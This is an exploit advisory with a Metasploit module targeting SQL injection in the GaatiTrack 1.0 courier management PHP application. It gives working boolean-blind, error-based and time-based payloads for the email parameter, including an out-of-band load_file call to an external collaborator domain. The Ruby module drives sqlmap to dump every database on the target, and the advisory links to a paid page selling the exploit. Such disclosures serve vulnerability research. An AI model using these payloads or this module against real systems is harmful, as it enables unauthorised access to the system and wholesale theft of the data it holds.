# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.mayurik.com/
# Software: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION SELECT 5005) END))-- -&password=r5I!g0t!W9
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
---
```
[+]MSF exploit:
```rb
##
# gaati.rb
#
# Author: nu11secur1ty
# Description: gaati-sqli
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
'Name' => 'gaati',
'Description' => 'gaati-sqli',
'Author' => ['nu11secur1ty'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from Burp)', '' ]),
OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py', '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
]
)
end
def run
raw_request = datastore['RAW_REQUEST']
sqlmap_path = datastore['SQLMAP_PATH'] || '/home/kali/sqlmap-nu11secur1ty/sqlmap.py'
if raw_request.nil? || raw_request.empty?
print_error("RAW_REQUEST is empty — will attempt to use system exploit.txt if present.")
end
# Prefer system exploit.txt in MSF module dir (no need to cat)
system_exploit = '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
use_file = nil
if File.exist?(system_exploit)
use_file = system_exploit
print_good("Using existing exploit file: #{use_file}")
else
# fallback: write to user-writable home dir
exploit_dir = File.join(Dir.home, ".msf_exploits")
Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
timestamp = Time.now.strftime("%Y%m%d%H%M%S")
tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")
if raw_request.nil? || raw_request.empty?
print_error("No RAW_REQUEST provided and no system exploit.txt found — nothing to do.")
return
end
begin
File.open(tmp_file, "w") { |f| f.write(raw_request) }
print_good("Saved RAW_REQUEST -> #{tmp_file}")
use_file = tmp_file
rescue Errno::EACCES => e
print_error("Cannot write temp exploit file: #{e}")
return
rescue => e
print_error("Failed to save temp request: #{e}")
return
end
end
unless File.exist?(sqlmap_path)
print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH option to correct path.")
# do not delete the temp file so user can inspect
return
end
sqlmap_cmd = [
"python3",
sqlmap_path,
"-r", use_file,
"--no-cast",
"--no-escape",
"--dbms=mysql",
"--time-sec=11",
"--random-agent",
"--level=5",
"--risk=3",
"--batch",
"--flush-session",
"--technique=TBEUSQ",
"--union-char=UCHAR",
'--answers="crack=Y,dict=Y,continue=Y,quit=N"',
"--dump-all"
].join(" ")
print_status("Executing sqlmap: #{sqlmap_cmd}")
begin
system(sqlmap_cmd)
print_good("sqlmap finished (check output above)")
rescue => e
print_error("Failed to execute sqlmap: #{e}")
ensure
# delete tmp file if we created it
if use_file != system_exploit
begin
File.delete(use_file) if File.exist?(use_file)
print_status("Deleted temporary file #{use_file}")
rescue => e
print_warning("Could not delete temporary file: #{e}")
end
end
end
end
end
```
# Reproduce:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Buy an exploit only:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>